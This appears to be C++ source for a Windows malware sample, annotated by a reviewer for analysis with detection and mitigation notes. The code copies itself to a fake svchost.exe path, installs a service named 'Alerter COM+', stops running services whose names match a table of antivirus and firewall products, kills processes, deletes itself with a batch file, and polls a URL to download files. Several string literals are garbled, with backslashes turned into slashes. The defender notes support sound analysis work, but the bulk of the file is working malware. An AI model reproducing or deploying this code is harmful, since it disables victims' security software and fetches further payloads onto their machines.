// WebDown.cpp : Defines the entry point for the console application.
//
// NOTE(review): This is a Windows malware sample (a self-installing service
// that polls a URL and disables security products), kept here for analysis.
// The comments below describe only what the visible code does and what a
// defender can look for; the code is left exactly as extracted, defects
// included. Artifacts that appear literally in this file:
//   - a copy of itself at <system dir>\spool\svchost.exe (the genuine
//     svchost.exe lives in the system directory itself, not in "spool")
//   - a Win32 service registered as "Alerter COM+"
//   - a self-deleting batch file rs.bat in the temp directory
//   - the poll URL held in modify_data.DownFile
//   - enumeration of all Win32 services and a stop request for any whose name
//     matches the AntiServ table, plus a process-termination helper
// Detection: service-install events (System log 7045 / Security log 4697),
// executable writes into the system directory by a non-installer process,
// ControlService(SERVICE_CONTROL_STOP) and OpenProcess(PROCESS_TERMINATE)
// directed at security-product services/processes, and cmd.exe launched with
// a batch file from the temp directory. Mitigation: every step above needs
// administrative rights, so non-admin daily-use accounts block it outright;
// tamper protection on endpoint security products covers the service/process
// kills.
// Extraction note: backslashes in this copy appear to have been turned into
// forward slashes (e.g. "//rs.bat", "/r/n", "//spool//svchost.exe"), so
// several string literals no longer compile as written; they are kept
// verbatim below rather than guessed at.
#include "stdafx.h"
#include "WebDown.h"
#include "winsvc.h"
#include "winsock2.h"
#pragma comment(lib,"ws2_32.lib")
#include "time.h"
#include "urlmon.h"
#pragma comment(lib,"urlmon.lib")
#include <tlhelp32.h>
// NOTE(review): the lone '/' on the next line is a garbled token in the
// extracted source (probably a comment separator); left as found.
/

// Runtime configuration, stored in the binary as a plain struct.
// WinMain() contains a commented-out DecryptRecord() call for it, so in
// this build the values below are stored unobfuscated and are therefore
// directly visible as strings in the executable.
struct MODIFY_DATA
{
    char DownFile[128];     // URL of the file list to poll
    int WaitTime;           // polling interval in minutes
}modify_data =
{
    "http://www.baidu.com/tmp.txt",
    60,                     // check interval, in minutes
};

// Globals. Only DownFileDate1/DownFileDate2 are used in this file; the
// others are presumably used by ServiceMain()/InstallService(), which are
// defined elsewhere (not visible here).
HWND hWnd;
char DownFileDate1[9]="00-00-00";   // timestamp of the last list file acted on
char DownFileDate2[9]="00-00-00";   // timestamp reported for the remote list file
SERVICE_STATUS service_status_ss;
SERVICE_STATUS_HANDLE handle_service_status;
SC_HANDLE scm,svc;
char test[128];

// Table of security-product process/service names that DisplayServices()
// compares running services against. It mixes anti-virus, personal-firewall
// and monitoring tools, but also generic names ("HELP", "GUARD", "MONITOR",
// "EXPERT") and Windows components ("sharedaccess" is the Internet
// Connection Sharing / firewall service, "NTVDM" the 16-bit subsystem), so
// matches are not limited to third-party security software. Entries
// prefixed with // were disabled by the author. These literal strings are a
// usable static signature for the binary.
char AntiServ[193][18] ={
    "ACKWIN32", "ADVXDWIN", "ALERTSVC", "ALOGSERV", "AMON9X", "ANTI-TROJAN", "ANTS", "apvxdwin",
    "ATCON", "ATUpdateR", "ATWATCH", "AUTODOWN", "AutoTrace", "AVCONSOL", "AVGCC32", "AVGCTRL",
    "Avgctrl", "AVGSERV", "AvgServ", "AVGSERV9", "AVGW", "avkpop", "AVKSERV", "avkservice",
    "avkwctl9", "AVP32", "AVP32", "AVPCC", "AVPCC", "AVPM", "AVPM", "Avsched32",
    "AVSYNMGR", "AvSynMgr", "AVWINNT", "AVXMONITOR9X", "AVXMONITORNT", "AVXQUAR", "AVXW", "BLACKD",
    "BLACKICE", "BlackICE", "CLAW95", "CLAW95CF", "CLEANER", "CLEANER3", "CMGRDIAN", "CONNECTIONMONITOR",
    "defscangui", "DEFWATCH", "DOORS", "DVP95", "EFPEADM", "ETRUSTCIPE", "EVPN", "EXPERT",
    "fameh32", "fch32", "fih32", "fnrb32", "fsaa", "fsav32", "fsgk32", "fsm32",
    "fsma32", "fsmb32", "gbmenu", "GENERICS", "GUARD", "GUARDDOG", "HELP", "IAMAPP",
    "IAMSERV", "ICLOAD95", "ICLOADNT", "ICMON", "ICSUPP95", "ICSUPPNT", "IFACE", "IOMON98",
    "ISRV95", "JEDI", "LDNETMON", "LDPROMENU", "LDSCAN", "LOCKDOWN", "LOCKDOWN2000", "LUALL",
    "LUCOMSERVER", "MCAGENT", "MCMNHDLR", "MCSHIELD", "McShield", "MCTOOL", "MCUpdate", "MCVSRTE",
    "MCVSSHLD", "MGAVRTCL", "MGAVRTE", "MGHTML", "minilog", "MONITOR", "MOOLIVE", "MWATCH",
    "NAVAP", "navapsvc", "NAVAPW32", "NAVENG", "NAVEX15", "NAVLU32", "NAVW32", "NAVWNT",
    "NDD32", "NeoWatchLog", "NETUTILS", "ngdbserv", "NGServer", "NISSERV", "NISSERV", "NISUM",
    "NISUM", "NMAIN",
    "NORMIST", "NPROTECT", "NPSSVC", "NSCHED32", "ntrtscan", "NTVDM", "NTXconfig", "NVC95",
    //"NVSVC32",
    "NWService", "NWTOOL16", "PADMIN", "pavproxy", "PCCIOMON", "pccntmon", "pccwin97", "PCCWIN98",
    "pcscan", "PERSFW", "POP3TRAP", "POPROXY", "PORTMONITOR", "PROCESSMONITOR", "PROGRAMAUDITOR", "PROT95",
    "PVIEW95", "RAV7", "RAV7WIN", "REALMON", "RESCUE", "RTVSCN95", "sbserv", "SCAN32",
    "SCRSCAN", "sharedaccess", "SPHINX", "SPYXX", "SS3EDIT", "STOPW", "SVW3", "SWEEP95",
    "SweepNet", "SWEEPSRV", "SWEEPSRV.SYS", "SweepUpdate", "SWNETSUP", "SymProxySvc", "SYMTRAY", "TFAK",
    "vbcmserv", "VbCons", "VET32", "VET95", "VETTRAY", "VPC32", "VPTRAY", "VSCHED",
    "VSECOMR", "VSHWIN32", "VSMAIN", "vsmon", "VSMON",
    //"VSSTAT",
    "WATCHDOG", "WEBSCANX", "WGFE95", "WIMMUN32", "WRADMIN", "WRCTRL", "ZAPROMINILOG", "ZONEALARM"
};

//====================================================================
// Terminates every running process whose image name equals processName
// (case-insensitive), by walking a Toolhelp32 process snapshot and calling
// OpenProcess(PROCESS_TERMINATE) + TerminateProcess on each match.
// Not referenced anywhere in the visible part of this file; presumably
// called from code defined elsewhere.
// Defender note: the OpenProcess(PROCESS_TERMINATE) -> TerminateProcess
// pair against a security product's process is the observable behaviour.
void KillProcess(char * processName)
{
    HANDLE hSnapshot;
    hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    PROCESSENTRY32 pe;
    Process32First(hSnapshot,&pe);
    do
    {
        CString KillProcessName = processName;
        if(KillProcessName.CompareNoCase(pe.szExeFile) == 0)
        {
            HANDLE hProcess;
            hProcess=OpenProcess(PROCESS_TERMINATE,FALSE,pe.th32ProcessID);
            if(hProcess)
            {
                TerminateProcess(hProcess,0);   // terminate the matching process
            }
        }
    } while(Process32Next(hSnapshot,&pe));
    CloseHandle(hSnapshot);
}

//
// Stops one service by name.
// Opens the SCM and the named service, queries its state and, unless it is
// already SERVICE_STOPPED, sends SERVICE_CONTROL_STOP and waits 500 ms.
// Neither handle is closed on any path. Return values of ControlService are
// ignored (the diagnostics were commented out by the author).
// Defender note: a ControlService(SERVICE_CONTROL_STOP) issued by an
// unexpected process against a security service is the event to alert on.
void StopServices(char * SvrName)
{
    CString name = SvrName;     // copy into a CString
    SC_HANDLE scm;
    SC_HANDLE service;
    SERVICE_STATUS status;
    if((scm=OpenSCManager(NULL,NULL,SC_MANAGER_CREATE_SERVICE))==NULL)
    {
        //printf("OpenSCManager Error/n");
        return;
    }
    service=OpenService(scm,name,SERVICE_ALL_ACCESS|DELETE);
    if (!service)
    {
        //printf("OpenService error!/n");
        return;
    }
    BOOL isSuccess=QueryServiceStatus(service,&status);
    if (!isSuccess)
    {
        //printf("QueryServiceStatus error!/n");
        return;
    }
    if ( status.dwCurrentState!=SERVICE_STOPPED )
    {
        isSuccess=ControlService(service,SERVICE_CONTROL_STOP,&status);
        //if (!isSuccess )
        //    printf("service stop failed!/n");
        //else
        //    printf("service stopped!/n");
        Sleep( 500 );
    }else
    {
        //printf("this service is not running!/n");
    }
}

// Enumerates all SERVICE_WIN32 services (single 64 KiB buffer, one
// EnumServicesStatus call) and, for each one that is SERVICE_RUNNING and
// whose name matches an AntiServ entry, calls StopServices() on it.
// The match is _strnicmp(serviceName, AntiServ[j], strlen(serviceName)):
// a case-insensitive comparison over the length of the *service* name only,
// so any service whose name is a prefix of a table entry also matches. Only
// the first 190 table entries are compared.
// Returns TRUE once enumeration has been performed, FALSE if the SCM could
// not be opened or the buffer/enumeration failed.
// Defender note: this function is why legitimate services can be stopped as
// collateral (short names, and Windows components listed in the table).
BOOL DisplayServices()
{
    LPENUM_SERVICE_STATUS lpServices = NULL;
    DWORD nSize = 0;
    DWORD nServicesReturned;
    DWORD nResumeHandle = 0;
    DWORD dwServiceType = SERVICE_WIN32;
    SC_HANDLE schSCManager = NULL;
    BOOL Flag = FALSE;
    DWORD i = 0;
    UINT j = 0;
    schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (schSCManager == NULL) // Fail To Open SCM
    {
        //printf("Fail To Open SCM/n");
        return FALSE;
    }
    lpServices = (LPENUM_SERVICE_STATUS) LocalAlloc(LPTR, 64 * 1024); // Allocate Ram
    if (lpServices == NULL) // Fail To Allocate Ram
    {
        //printf("Fail To Allocate Ram/n");
        goto CleanUP;
    }
    // Enum All Service Based On Service Type
    if (EnumServicesStatus(schSCManager, dwServiceType, SERVICE_STATE_ALL, (LPENUM_SERVICE_STATUS)lpServices, 64 * 1024, &nSize, &nServicesReturned, &nResumeHandle) == NULL)
    {
        //printf("Fail To Enum Service/n");
        goto CleanUP;
    }
    // Display The Services
    // Compare each service name against the table; stop it on a match.
    //printf("%-34s%s/n/n","ServiceName","DisplayName");
    for (i = 0; i < nServicesReturned; i++)
    {
        //printf("%s/n",lpServices[i].lpServiceName);
        // match against the AntiServ table
        for(int j = 0 ; j < 190;j++)
        {
            if(!_strnicmp(lpServices[i].lpServiceName,AntiServ[j],strlen(lpServices[i].lpServiceName)))
            {
                //printf("FindServer:%s/n",lpServices[i].lpServiceName);
                if (lpServices[i].ServiceStatus.dwCurrentState == SERVICE_RUNNING)
                {
                    //printf("STOPServer:%s/n",lpServices[i].lpServiceName);
                    StopServices(lpServices[i].lpServiceName);
                }
            }
        }
    }
    Flag = TRUE;
    // Close Service Handle,Free Allocated Ram And Return To The Caller
CleanUP:
    CloseServiceHandle(schSCManager);
    if (lpServices != NULL)
    {
        LocalFree(lpServices);
    }
    getchar ();
    return Flag;
}

//
// Worker thread body (signature matches a CreateThread start routine; the
// thread is started from code not visible here, presumably ServiceMain).
// Infinite loop, once per modify_data.WaitTime minutes:
//   1. DisplayServices() - stop any running service matching AntiServ;
//   2. GetDownFileDate(URL, DownFileDate2) - defined elsewhere; from its use
//      here it appears to fetch a timestamp for the remote list file;
//   3. if that 8-character timestamp differs from the one last acted on,
//      DownFiles(URL) - defined elsewhere - is called and the timestamp
//      remembered in DownFileDate1.
// dParam is unused. The function never returns under normal operation.
// Defender note: the periodic HTTP request to the configured URL at a fixed
// interval is a beaconing pattern visible in proxy/DNS logs.
unsigned long CALLBACK DOWN_thread(LPVOID dParam)
{
    while(1)
    {
        //MessageBox(NULL,"STOP SERVER","TODO",MB_OK);
        /// First scan the services and stop any that match; Win32 services only.
        DisplayServices();
        if(GetDownFileDate(modify_data.DownFile,DownFileDate2))   // store the remote list file's timestamp in Date2
        {
            if (strncmp(DownFileDate1,DownFileDate2,8)!=0)       // list timestamp changed
            {   // files need to be downloaded
                DownFiles(modify_data.DownFile);                  // download every file in the list
                //DownExec(modify_data.DownFile);                 // download file
                strcpy(DownFileDate1,DownFileDate2);
            }
        }
        Sleep(modify_data.WaitTime*60*1000);    // once every WaitTime minutes
    }
    return 0;
}

//***********************************************// self-delete
// Deletes the currently running executable after it exits.
// Writes a batch file rs.bat into the temp directory (a :kill loop that
// strips attributes from %1, deletes %1 until it is gone, then deletes
// itself via %0), then runs it through %comspec% /c with this module's path
// as %1, detached and with the window hidden. The literal 94 is the
// hard-coded byte count handed to WriteFile for the batch text.
// The author credits the technique to Spybot (see the original comment).
// Defender note: cmd.exe spawned with "<temp>\rs.bat <path of an exe>" is a
// distinctive process-creation signature for this sample.
void uninstall(void)//Thanks to Spybot
{
    char batfile[MAX_PATH];
    char tempdir[MAX_PATH];
    char tcmdline[MAX_PATH];
    char cmdline[MAX_PATH];
    char This_File[MAX_PATH];
    HANDLE f;
    DWORD r;
    PROCESS_INFORMATION pinfo;
    STARTUPINFO sinfo;
    GetTempPath(sizeof(tempdir), tempdir);
    sprintf(batfile, "%s//rs.bat", tempdir);
    f = CreateFile(batfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
    if (f != INVALID_HANDLE_VALUE)
    {
        // NOTE(review): the batch text below is as extracted; the escapes
        // (\r\n, \") were mangled into '/' by extraction and do not compile.
        WriteFile(f,"@echo off/r/n"
                    ":kill/r/n"
                    "attrib -a -r -s -h /"%1/"/r/n"
                    "del /F /"%1/"/r/n"
                    "if exist /"%1/" goto kill/r/n"
                    "del /F /"%0/"/r/n"
                    ,94, &r,NULL );
        CloseHandle(f);
        memset(&sinfo, 0, sizeof(STARTUPINFO));
        sinfo.cb = sizeof(sinfo);
        sinfo.wShowWindow = SW_HIDE;
        memset(This_File,0,sizeof(This_File));
        GetModuleFileName(NULL, This_File, sizeof(This_File));
        sprintf(tcmdline, "%%comspec%% /c %s %s", batfile, This_File); // build command line
        ExpandEnvironmentStrings(tcmdline, cmdline, sizeof(cmdline)); // put the name of the command interpreter into the command line
        // execute the batch file
        CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo);
    }
}

// Program entry point.
// Stage 1 (running from anywhere except the install path): deletes any
// existing <system dir>\spool\svchost.exe, copies itself there, launches the
// copy with the system directory as its working directory, arranges its own
// deletion via uninstall(), and exits. Returns -1 if the copy fails.
// Stage 2 (running from the install path): registers a service table with
// the single entry "Alerter COM+" -> ServiceMain (defined elsewhere) and
// hands control to StartServiceCtrlDispatcher. If the dispatcher refuses
// (i.e. the process was not started by the SCM), InstallService() - defined
// elsewhere - is called; from its name and position this is presumably the
// first-run service installation.
// The config-decryption call is commented out, so modify_data is used as
// stored.
// Defender note: an executable named svchost.exe under <system dir>\spool
// and a service named "Alerter COM+" are the two host-based indicators.
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    int nRetCode = 0;
    /// self-copy ----------------------
    char SysDirBuff[256];
    char filename[256];
    char This_File[256];
    ::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
    strcpy(filename,SysDirBuff);
    strcat(filename,"//spool//svchost.exe");
    GetModuleFileName(NULL, This_File, sizeof(This_File));
    if (_stricmp(This_File,filename)!=0)
    {
        DeleteFile(filename);
        if(::CopyFile(This_File,filename,FALSE)==0)
            return -1;
        PROCESS_INFORMATION pinfo;
        STARTUPINFO sinfo;
        memset(&pinfo,0,sizeof(pinfo));
        memset(&sinfo,0,sizeof(sinfo));
        CreateProcess(filename,NULL, NULL, NULL,TRUE,0, NULL,SysDirBuff, &sinfo, &pinfo);
        uninstall();
        ExitProcess(0);
    }
    // Decryption step commented out: removed for unit testing, config is not encrypted.
    //DecryptRecord((char*)&modify_data,sizeof(MODIFY_DATA),"4321");
    // Service entry table -----------------------------------
    SERVICE_TABLE_ENTRY service_tab_entry[2];
    service_tab_entry[0].lpServiceName="Alerter COM+";   // service name
    service_tab_entry[0].lpServiceProc=ServiceMain;     // service entry point
    // Several entries are allowed; the last one must be NULL.
    service_tab_entry[1].lpServiceName=NULL;
    service_tab_entry[1].lpServiceProc=NULL;
    if (StartServiceCtrlDispatcher(service_tab_entry)==0)   // not started by the SCM: first run
    {
        InstallService();
    }
    return nRetCode;
}
/***********************************************/